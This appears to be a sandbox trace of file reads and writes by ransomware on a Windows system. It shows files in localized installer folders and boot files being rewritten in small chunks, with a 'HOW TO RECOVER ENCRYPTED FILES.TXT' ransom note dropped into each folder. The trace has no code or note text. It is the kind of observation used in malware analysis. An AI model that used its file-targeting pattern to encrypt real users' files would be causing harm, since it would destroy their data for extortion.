Read	C:\588bce7c90097ed212\1045\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175, size_out = 2175	1	Fn Data
Read	C:\588bce7c90097ed212\1046\eula.rtf	size = 1024, size_out = 1024	1	Fn Data
Read	C:\588bce7c90097ed212\1046\LocalizedData.xml	size = 1024, size_out = 1024	2	Fn Data
Read	C:\588bce7c90097ed212\1046\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175, size_out = 2175	1	Fn Data
Read	C:\588bce7c90097ed212\1049\eula.rtf	size = 1024, size_out = 1024	1	Fn Data
Read	C:\588bce7c90097ed212\1049\LocalizedData.xml	size = 1024, size_out = 1024	2	Fn Data
Read	C:\588bce7c90097ed212\1049\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175, size_out = 2175	1	Fn Data
Read	C:\588bce7c90097ed212\1053\eula.rtf	size = 1024, size_out = 1024	1	Fn Data
Read	C:\588bce7c90097ed212\1053\LocalizedData.xml	size = 1024, size_out = 1024	2	Fn Data
Read	C:\588bce7c90097ed212\1053\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175, size_out = 2175	1	Fn Data
Read	C:\588bce7c90097ed212\1055\eula.rtf	size = 1024, size_out = 1024	1	Fn Data
Read	C:\588bce7c90097ed212\1055\LocalizedData.xml	size = 1024, size_out = 1024	2	Fn Data
Read	C:\588bce7c90097ed212\1055\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175, size_out = 2175	1	Fn Data
Read	C:\588bce7c90097ed212\2052\eula.rtf	size = 1024, size_out = 1024	1	Fn Data
Read	C:\588bce7c90097ed212\2052\LocalizedData.xml	size = 1024, size_out = 1024	1	Fn Data
Read	C:\588bce7c90097ed212\2052\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175, size_out = 2175	1	Fn Data
Read	C:\588bce7c90097ed212\2070\eula.rtf	size = 1024, size_out = 1024	1	Fn Data
Read	C:\588bce7c90097ed212\2070\LocalizedData.xml	size = 1024, size_out = 1024	2	Fn Data
Read	C:\588bce7c90097ed212\2070\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175, size_out = 2175	1	Fn Data
Read	C:\588bce7c90097ed212\3076\eula.rtf	size = 1024, size_out = 1024	1	Fn Data
Read	C:\588bce7c90097ed212\3076\LocalizedData.xml	size = 1024, size_out = 1024	1	Fn Data
Read	C:\588bce7c90097ed212\3076\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175, size_out = 2175	1	Fn Data
Read	C:\588bce7c90097ed212\3082\eula.rtf	size = 1024, size_out = 1024	1	Fn Data
Read	C:\588bce7c90097ed212\3082\LocalizedData.xml	size = 1024, size_out = 1024	2	Fn Data
Read	C:\588bce7c90097ed212\3082\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175, size_out = 2175	1	Fn Data
Read	C:\588bce7c90097ed212\Client\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175, size_out = 2175	1	Fn Data
Read	C:\588bce7c90097ed212\Extended\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175, size_out = 2175	1	Fn Data
Read	C:\588bce7c90097ed212\Graphics\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175, size_out = 2175	3	Fn Data
Read	C:\588bce7c90097ed212\Graphics\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175, size_out = 2175	4	Fn Data
Write	C:\я	size = 1	1	Fn Data
Write	C:\BOOTNXT	size = 1	2	Fn Data
Write	C:\BOOTNXT	size = 23	1	Fn Data
Write	C:\BOOTNXT	size = 178	1	Fn Data
Write	C:\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175	1	Fn Data
Write	C:\BOOTSECT.BAK	size = 1	1	Fn Data
Write	C:\BOOTSECT.BAK	size = 1024	1	Fn Data
Write	C:\BOOTSECT.BAK	size = 24	1	Fn Data
Write	C:\BOOTSECT.BAK	size = 178	1	Fn Data
Write	C:\588bce7c90097ed212\я	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\DHtmlHeader.html	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\DHtmlHeader.html	size = 1024	1	Fn Data
Write	C:\588bce7c90097ed212\DHtmlHeader.html	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\DHtmlHeader.html	size = 178	1	Fn Data
Write	C:\588bce7c90097ed212\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175	1	Fn Data
Write	C:\588bce7c90097ed212\DisplayIcon.ico	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\DisplayIcon.ico	size = 1024	2	Fn Data
Write	C:\588bce7c90097ed212\DisplayIcon.ico	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\DisplayIcon.ico	size = 194	1	Fn Data
Write	C:\588bce7c90097ed212\header.bmp	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\header.bmp	size = 1024	1	Fn Data
Write	C:\588bce7c90097ed212\header.bmp	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\header.bmp	size = 178	1	Fn Data
Write	C:\588bce7c90097ed212\netfx_Core_x64.msi	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\netfx_Core_x64.msi	size = 1024	58	Fn Data
Write	C:\588bce7c90097ed212\netfx_Core_x64.msi	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\netfx_Core_x64.msi	size = 642	1	Fn Data
Write	C:\588bce7c90097ed212\netfx_Core_x86.msi	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\netfx_Core_x86.msi	size = 1024	35	Fn Data
Write	C:\588bce7c90097ed212\netfx_Core_x86.msi	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\netfx_Core_x86.msi	size = 458	1	Fn Data
Write	C:\588bce7c90097ed212\netfx_Extended_x64.msi	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\netfx_Extended_x64.msi	size = 1024	26	Fn Data
Write	C:\588bce7c90097ed212\netfx_Extended_x64.msi	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\netfx_Extended_x64.msi	size = 386	1	Fn Data
Write	C:\588bce7c90097ed212\netfx_Extended_x86.msi	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\netfx_Extended_x86.msi	size = 1024	15	Fn Data
Write	C:\588bce7c90097ed212\netfx_Extended_x86.msi	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\netfx_Extended_x86.msi	size = 298	1	Fn Data
Write	C:\588bce7c90097ed212\ParameterInfo.xml	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\ParameterInfo.xml	size = 1024	8	Fn Data
Write	C:\588bce7c90097ed212\ParameterInfo.xml	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\ParameterInfo.xml	size = 242	1	Fn Data
Write	C:\588bce7c90097ed212\RGB9RAST_x64.msi	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\RGB9RAST_x64.msi	size = 1024	5	Fn Data
Write	C:\588bce7c90097ed212\RGB9RAST_x64.msi	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\RGB9RAST_x64.msi	size = 218	1	Fn Data
Write	C:\588bce7c90097ed212\RGB9Rast_x86.msi	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\RGB9Rast_x86.msi	size = 1024	2	Fn Data
Write	C:\588bce7c90097ed212\RGB9Rast_x86.msi	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\RGB9Rast_x86.msi	size = 194	1	Fn Data
Write	C:\588bce7c90097ed212\SetupUi.xsd	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\SetupUi.xsd	size = 1024	1	Fn Data
Write	C:\588bce7c90097ed212\SetupUi.xsd	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\SetupUi.xsd	size = 178	1	Fn Data
Write	C:\588bce7c90097ed212\SplashScreen.bmp	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\SplashScreen.bmp	size = 1024	1	Fn Data
Write	C:\588bce7c90097ed212\SplashScreen.bmp	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\SplashScreen.bmp	size = 186	1	Fn Data
Write	C:\588bce7c90097ed212\Strings.xml	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\Strings.xml	size = 1024	1	Fn Data
Write	C:\588bce7c90097ed212\Strings.xml	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\Strings.xml	size = 178	1	Fn Data
Write	C:\588bce7c90097ed212\UiInfo.xml	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\UiInfo.xml	size = 1024	1	Fn Data
Write	C:\588bce7c90097ed212\UiInfo.xml	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\UiInfo.xml	size = 186	1	Fn Data
Write	C:\588bce7c90097ed212\watermark.bmp	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\watermark.bmp	size = 1024	3	Fn Data
Write	C:\588bce7c90097ed212\watermark.bmp	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\watermark.bmp	size = 202	1	Fn Data
Write	C:\588bce7c90097ed212\1025\я	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1025\eula.rtf	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1025\eula.rtf	size = 1024	1	Fn Data
Write	C:\588bce7c90097ed212\1025\eula.rtf	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1025\eula.rtf	size = 178	1	Fn Data
Write	C:\588bce7c90097ed212\1025\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175	1	Fn Data
Write	C:\588bce7c90097ed212\1025\LocalizedData.xml	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1025\LocalizedData.xml	size = 1024	2	Fn Data
Write	C:\588bce7c90097ed212\1025\LocalizedData.xml	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1025\LocalizedData.xml	size = 194	1	Fn Data
Write	C:\588bce7c90097ed212\1028\я	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1028\eula.rtf	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1028\eula.rtf	size = 1024	1	Fn Data
Write	C:\588bce7c90097ed212\1028\eula.rtf	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1028\eula.rtf	size = 178	1	Fn Data
Write	C:\588bce7c90097ed212\1028\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175	1	Fn Data
Write	C:\588bce7c90097ed212\1028\LocalizedData.xml	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1028\LocalizedData.xml	size = 1024	1	Fn Data
Write	C:\588bce7c90097ed212\1028\LocalizedData.xml	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1028\LocalizedData.xml	size = 186	1	Fn Data
Write	C:\588bce7c90097ed212\1029\я	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1029\eula.rtf	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1029\eula.rtf	size = 1024	1	Fn Data
Write	C:\588bce7c90097ed212\1029\eula.rtf	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1029\eula.rtf	size = 178	1	Fn Data
Write	C:\588bce7c90097ed212\1029\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175	1	Fn Data
Write	C:\588bce7c90097ed212\1029\LocalizedData.xml	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1029\LocalizedData.xml	size = 1024	2	Fn Data
Write	C:\588bce7c90097ed212\1029\LocalizedData.xml	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1029\LocalizedData.xml	size = 194	1	Fn Data
Write	C:\588bce7c90097ed212\1030\я	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1030\eula.rtf	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1030\eula.rtf	size = 1024	1	Fn Data
Write	C:\588bce7c90097ed212\1030\eula.rtf	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1030\eula.rtf	size = 178	1	Fn Data
Write	C:\588bce7c90097ed212\1030\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175	1	Fn Data
Write	C:\588bce7c90097ed212\1030\LocalizedData.xml	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1030\LocalizedData.xml	size = 1024	2	Fn Data
Write	C:\588bce7c90097ed212\1030\LocalizedData.xml	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1030\LocalizedData.xml	size = 194	1	Fn Data
Write	C:\588bce7c90097ed212\1031\я	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1031\eula.rtf	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1031\eula.rtf	size = 1024	1	Fn Data
Write	C:\588bce7c90097ed212\1031\eula.rtf	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1031\eula.rtf	size = 178	1	Fn Data
Write	C:\588bce7c90097ed212\1031\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175	1	Fn Data
Write	C:\588bce7c90097ed212\1031\LocalizedData.xml	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1031\LocalizedData.xml	size = 1024	2	Fn Data
Write	C:\588bce7c90097ed212\1031\LocalizedData.xml	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1031\LocalizedData.xml	size = 194	1	Fn Data
Write	C:\588bce7c90097ed212\1032\я	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1032\eula.rtf	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1032\eula.rtf	size = 1024	1	Fn Data
Write	C:\588bce7c90097ed212\1032\eula.rtf	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1032\eula.rtf	size = 178	1	Fn Data
Write	C:\588bce7c90097ed212\1032\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175	1	Fn Data
Write	C:\588bce7c90097ed212\1032\LocalizedData.xml	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1032\LocalizedData.xml	size = 1024	2	Fn Data
Write	C:\588bce7c90097ed212\1032\LocalizedData.xml	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1032\LocalizedData.xml	size = 194	1	Fn Data
Write	C:\588bce7c90097ed212\1033\я	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1033\eula.rtf	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1033\eula.rtf	size = 1024	1	Fn Data
Write	C:\588bce7c90097ed212\1033\eula.rtf	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1033\eula.rtf	size = 178	1	Fn Data
Write	C:\588bce7c90097ed212\1033\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175	1	Fn Data
Write	C:\588bce7c90097ed212\1033\LocalizedData.xml	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1033\LocalizedData.xml	size = 1024	2	Fn Data
Write	C:\588bce7c90097ed212\1033\LocalizedData.xml	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1033\LocalizedData.xml	size = 194	1	Fn Data
Write	C:\588bce7c90097ed212\1035\я	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1035\eula.rtf	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1035\eula.rtf	size = 1024	1	Fn Data
Write	C:\588bce7c90097ed212\1035\eula.rtf	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1035\eula.rtf	size = 178	1	Fn Data
Write	C:\588bce7c90097ed212\1035\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175	1	Fn Data
Write	C:\588bce7c90097ed212\1035\LocalizedData.xml	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1035\LocalizedData.xml	size = 1024	2	Fn Data
Write	C:\588bce7c90097ed212\1035\LocalizedData.xml	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1035\LocalizedData.xml	size = 194	1	Fn Data
Write	C:\588bce7c90097ed212\1036\я	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1036\eula.rtf	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1036\eula.rtf	size = 1024	1	Fn Data
Write	C:\588bce7c90097ed212\1036\eula.rtf	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1036\eula.rtf	size = 178	1	Fn Data
Write	C:\588bce7c90097ed212\1036\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175	1	Fn Data
Write	C:\588bce7c90097ed212\1036\LocalizedData.xml	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1036\LocalizedData.xml	size = 1024	2	Fn Data
Write	C:\588bce7c90097ed212\1036\LocalizedData.xml	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1036\LocalizedData.xml	size = 194	1	Fn Data
Write	C:\588bce7c90097ed212\1037\я	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1037\eula.rtf	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1037\eula.rtf	size = 1024	1	Fn Data
Write	C:\588bce7c90097ed212\1037\eula.rtf	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1037\eula.rtf	size = 178	1	Fn Data
Write	C:\588bce7c90097ed212\1037\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175	1	Fn Data
Write	C:\588bce7c90097ed212\1037\LocalizedData.xml	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1037\LocalizedData.xml	size = 1024	2	Fn Data
Write	C:\588bce7c90097ed212\1037\LocalizedData.xml	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1037\LocalizedData.xml	size = 194	1	Fn Data
Write	C:\588bce7c90097ed212\1038\я	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1038\eula.rtf	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1038\eula.rtf	size = 1024	1	Fn Data
Write	C:\588bce7c90097ed212\1038\eula.rtf	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1038\eula.rtf	size = 178	1	Fn Data
Write	C:\588bce7c90097ed212\1038\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175	1	Fn Data
Write	C:\588bce7c90097ed212\1038\LocalizedData.xml	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1038\LocalizedData.xml	size = 1024	2	Fn Data
Write	C:\588bce7c90097ed212\1038\LocalizedData.xml	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1038\LocalizedData.xml	size = 194	1	Fn Data
Write	C:\588bce7c90097ed212\1040\я	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1040\eula.rtf	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1040\eula.rtf	size = 1024	1	Fn Data
Write	C:\588bce7c90097ed212\1040\eula.rtf	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1040\eula.rtf	size = 178	1	Fn Data
Write	C:\588bce7c90097ed212\1040\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175	1	Fn Data
Write	C:\588bce7c90097ed212\1040\LocalizedData.xml	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1040\LocalizedData.xml	size = 1024	2	Fn Data
Write	C:\588bce7c90097ed212\1040\LocalizedData.xml	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1040\LocalizedData.xml	size = 194	1	Fn Data
Write	C:\588bce7c90097ed212\1041\я	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1041\eula.rtf	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1041\eula.rtf	size = 1024	1	Fn Data
Write	C:\588bce7c90097ed212\1041\eula.rtf	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1041\eula.rtf	size = 178	1	Fn Data
Write	C:\588bce7c90097ed212\1041\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175	1	Fn Data
Write	C:\588bce7c90097ed212\1041\LocalizedData.xml	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1041\LocalizedData.xml	size = 1024	2	Fn Data
Write	C:\588bce7c90097ed212\1041\LocalizedData.xml	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1041\LocalizedData.xml	size = 194	1	Fn Data
Write	C:\588bce7c90097ed212\1042\я	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1042\eula.rtf	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1042\eula.rtf	size = 1024	1	Fn Data
Write	C:\588bce7c90097ed212\1042\eula.rtf	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1042\eula.rtf	size = 178	1	Fn Data
Write	C:\588bce7c90097ed212\1042\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175	1	Fn Data
Write	C:\588bce7c90097ed212\1042\LocalizedData.xml	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1042\LocalizedData.xml	size = 1024	1	Fn Data
Write	C:\588bce7c90097ed212\1042\LocalizedData.xml	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1042\LocalizedData.xml	size = 186	1	Fn Data
Write	C:\588bce7c90097ed212\1043\я	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1043\eula.rtf	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1043\eula.rtf	size = 1024	1	Fn Data
Write	C:\588bce7c90097ed212\1043\eula.rtf	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1043\eula.rtf	size = 178	1	Fn Data
Write	C:\588bce7c90097ed212\1043\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175	1	Fn Data
Write	C:\588bce7c90097ed212\1043\LocalizedData.xml	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1043\LocalizedData.xml	size = 1024	2	Fn Data
Write	C:\588bce7c90097ed212\1043\LocalizedData.xml	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1043\LocalizedData.xml	size = 194	1	Fn Data
Write	C:\588bce7c90097ed212\1044\я	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1044\eula.rtf	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1044\eula.rtf	size = 1024	1	Fn Data
Write	C:\588bce7c90097ed212\1044\eula.rtf	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1044\eula.rtf	size = 178	1	Fn Data
Write	C:\588bce7c90097ed212\1044\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175	1	Fn Data
Write	C:\588bce7c90097ed212\1044\LocalizedData.xml	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1044\LocalizedData.xml	size = 1024	2	Fn Data
Write	C:\588bce7c90097ed212\1044\LocalizedData.xml	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1044\LocalizedData.xml	size = 194	1	Fn Data
Write	C:\588bce7c90097ed212\1045\я	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1045\eula.rtf	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1045\eula.rtf	size = 1024	1	Fn Data
Write	C:\588bce7c90097ed212\1045\eula.rtf	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1045\eula.rtf	size = 178	1	Fn Data
Write	C:\588bce7c90097ed212\1045\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175	1	Fn Data
Write	C:\588bce7c90097ed212\1045\LocalizedData.xml	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1045\LocalizedData.xml	size = 1024	2	Fn Data
Write	C:\588bce7c90097ed212\1045\LocalizedData.xml	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1045\LocalizedData.xml	size = 194	1	Fn Data
Write	C:\588bce7c90097ed212\1046\я	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1046\eula.rtf	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1046\eula.rtf	size = 1024	1	Fn Data
Write	C:\588bce7c90097ed212\1046\eula.rtf	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1046\eula.rtf	size = 178	1	Fn Data
Write	C:\588bce7c90097ed212\1046\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175	1	Fn Data
Write	C:\588bce7c90097ed212\1046\LocalizedData.xml	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1046\LocalizedData.xml	size = 1024	2	Fn Data
Write	C:\588bce7c90097ed212\1046\LocalizedData.xml	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1046\LocalizedData.xml	size = 194	1	Fn Data
Write	C:\588bce7c90097ed212\1049\я	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1049\eula.rtf	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1049\eula.rtf	size = 1024	1	Fn Data
Write	C:\588bce7c90097ed212\1049\eula.rtf	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1049\eula.rtf	size = 186	1	Fn Data
Write	C:\588bce7c90097ed212\1049\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175	1	Fn Data
Write	C:\588bce7c90097ed212\1049\LocalizedData.xml	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1049\LocalizedData.xml	size = 1024	2	Fn Data
Write	C:\588bce7c90097ed212\1049\LocalizedData.xml	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1049\LocalizedData.xml	size = 194	1	Fn Data
Write	C:\588bce7c90097ed212\1053\я	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1053\eula.rtf	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1053\eula.rtf	size = 1024	1	Fn Data
Write	C:\588bce7c90097ed212\1053\eula.rtf	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1053\eula.rtf	size = 178	1	Fn Data
Write	C:\588bce7c90097ed212\1053\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175	1	Fn Data
Write	C:\588bce7c90097ed212\1053\LocalizedData.xml	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1053\LocalizedData.xml	size = 1024	2	Fn Data
Write	C:\588bce7c90097ed212\1053\LocalizedData.xml	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1053\LocalizedData.xml	size = 194	1	Fn Data
Write	C:\588bce7c90097ed212\1055\я	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1055\eula.rtf	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1055\eula.rtf	size = 1024	1	Fn Data
Write	C:\588bce7c90097ed212\1055\eula.rtf	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1055\eula.rtf	size = 178	1	Fn Data
Write	C:\588bce7c90097ed212\1055\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175	1	Fn Data
Write	C:\588bce7c90097ed212\1055\LocalizedData.xml	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\1055\LocalizedData.xml	size = 1024	2	Fn Data
Write	C:\588bce7c90097ed212\1055\LocalizedData.xml	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\1055\LocalizedData.xml	size = 194	1	Fn Data
Write	C:\588bce7c90097ed212\2052\я	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\2052\eula.rtf	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\2052\eula.rtf	size = 1024	1	Fn Data
Write	C:\588bce7c90097ed212\2052\eula.rtf	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\2052\eula.rtf	size = 178	1	Fn Data
Write	C:\588bce7c90097ed212\2052\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175	1	Fn Data
Write	C:\588bce7c90097ed212\2052\LocalizedData.xml	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\2052\LocalizedData.xml	size = 1024	1	Fn Data
Write	C:\588bce7c90097ed212\2052\LocalizedData.xml	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\2052\LocalizedData.xml	size = 186	1	Fn Data
Write	C:\588bce7c90097ed212\2070\я	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\2070\eula.rtf	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\2070\eula.rtf	size = 1024	1	Fn Data
Write	C:\588bce7c90097ed212\2070\eula.rtf	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\2070\eula.rtf	size = 178	1	Fn Data
Write	C:\588bce7c90097ed212\2070\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175	1	Fn Data
Write	C:\588bce7c90097ed212\2070\LocalizedData.xml	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\2070\LocalizedData.xml	size = 1024	2	Fn Data
Write	C:\588bce7c90097ed212\2070\LocalizedData.xml	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\2070\LocalizedData.xml	size = 194	1	Fn Data
Write	C:\588bce7c90097ed212\3076\я	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\3076\eula.rtf	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\3076\eula.rtf	size = 1024	1	Fn Data
Write	C:\588bce7c90097ed212\3076\eula.rtf	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\3076\eula.rtf	size = 178	1	Fn Data
Write	C:\588bce7c90097ed212\3076\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175	1	Fn Data
Write	C:\588bce7c90097ed212\3076\LocalizedData.xml	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\3076\LocalizedData.xml	size = 1024	1	Fn Data
Write	C:\588bce7c90097ed212\3076\LocalizedData.xml	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\3076\LocalizedData.xml	size = 186	1	Fn Data
Write	C:\588bce7c90097ed212\3082\я	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\3082\eula.rtf	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\3082\eula.rtf	size = 1024	1	Fn Data
Write	C:\588bce7c90097ed212\3082\eula.rtf	size = 24	1	Fn Data
